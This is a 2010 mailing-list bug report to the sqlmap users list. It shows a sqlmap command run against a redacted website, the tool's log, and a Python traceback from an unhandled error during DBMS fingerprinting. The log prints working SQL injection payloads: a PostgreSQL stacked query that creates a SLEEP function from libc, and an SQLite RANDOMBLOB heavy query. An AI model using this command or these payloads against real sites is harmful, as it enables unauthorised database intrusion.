[sqlmap-users] New Error
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] New Error
|
From: <nig...@em...> - 2010-12-17 06:34:50
|
sqlmap -u "http://xxxxxx.xxx/html.php?Html_showFile=rss&app_state=4f25b469f81cab0f&xxx=1" -o -a C:\pentest\sqlmap.0.9\txt\user-agents.txt --level 5 --risk 3 -f -b [03:44:42] [INFO] testing connection to the target url [03:44:52] [INFO] testing NULL connection to the target url [03:44:57] [INFO] testing if the url is stable, wait a few seconds [03:45:00] [INFO] url is stable all the tests.... Cookie parameter 'app_state' is vulnerable. Do you want to keep testing the others? [y/N] y sqlmap identified the following injection points with 10051 HTTP(s) requests: --- Place: GET Parameter: xxx Type: stacked queries Title: PostgreSQL < 8.2 stacked queries (Glibc) Payload: Html_showFile=rss&app_state=4f25b469f81cab0f&xxx=1))); CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS CHR(47)| |CHR(108)||CHR(105)||CHR(98)||CHR(47)||CHR(108)||CHR(105)||CHR(98)||CHR(99)||CHR(46)||CHR(115)||CHR(111)||CHR(46)||CHR(54), CHR(11 5)||CHR(108)||CHR(101)||CHR(101)||CHR(112) language CHR(67) STRICT; SELECT sleep(5);-- AND (((6808=6808 Place: Cookie Parameter: app_state Type: stacked queries Title: SQLite > 2.0 stacked queries (heavy query) Payload: app_state=4f25b469f81cab0f'); SELECT LIKE(X'41'||X'42'||X'43'||X'44'||X'45'||X'46'||X'47', UPPER(HEX(RANDOMBLOB(50000 000))));-- AND ('eLhg' LIKE 'eLhg;frw_test_cookie=1 --- there were multiple injection points, please select the one to use for following injections: [0] place: GET, parameter: xxx, type: Unescaped numeric (default) [1] place: Cookie, parameter: app_state, type: LIKE single quoted string [q] Quit > 0 [07:24:11] [INFO] testing PostgreSQL [07:24:12] [WARNING] the back-end DBMS is not PostgreSQL [07:24:12] [INFO] testing MySQL [07:24:12] [WARNING] the back-end DBMS is not MySQL [07:24:12] [INFO] testing Oracle [07:24:12] [WARNING] the back-end DBMS is not Oracle [07:24:12] [INFO] testing Microsoft SQL Server [07:24:13] [WARNING] the back-end DBMS is not Microsoft SQL Server [07:24:13] [INFO] the back-end DBMS is SQLite [07:24:13] [INFO] fetching banner [07:24:13] [INFO] retrieving the length of query output [07:24:13] [INFO] retrieved: [07:24:16] [INFO] retrieved: [07:24:19] [INFO] testing SQLite [07:24:20] [WARNING] the back-end DBMS is not SQLite [07:24:20] [INFO] testing Microsoft Access [07:24:21] [WARNING] the back-end DBMS is not Microsoft Access [07:24:21] [INFO] testing Firebird [07:24:21] [WARNING] the back-end DBMS is not Firebird [07:24:21] [INFO] testing SAP MaxDB [07:24:22] [WARNING] the back-end DBMS is not SAP MaxDB [07:24:22] [INFO] testing Sybase [07:24:22] [WARNING] the back-end DBMS is not Sybase [07:24:22] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversio n repository. If the exception persists, please send by e-mail to sql...@li... the command line, the followi ng text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 0.9-dev Python version: 2.6.5 Operating system: nt Traceback (most recent call last): File "C:\pentest\sqlmap.0.9\sqlmap.py", line 79, in main start() File "C:\pentest\sqlmap.0.9\lib\controller\controller.py", line 393, in start action() File "C:\pentest\sqlmap.0.9\lib\controller\action.py", line 57, in action dataToStdout("%s\n" % conf.dbmsHandler.getFingerprint()) AttributeError: 'NoneType' object has no attribute 'getFingerprint' [*] shutting down at: 07:24:22 |
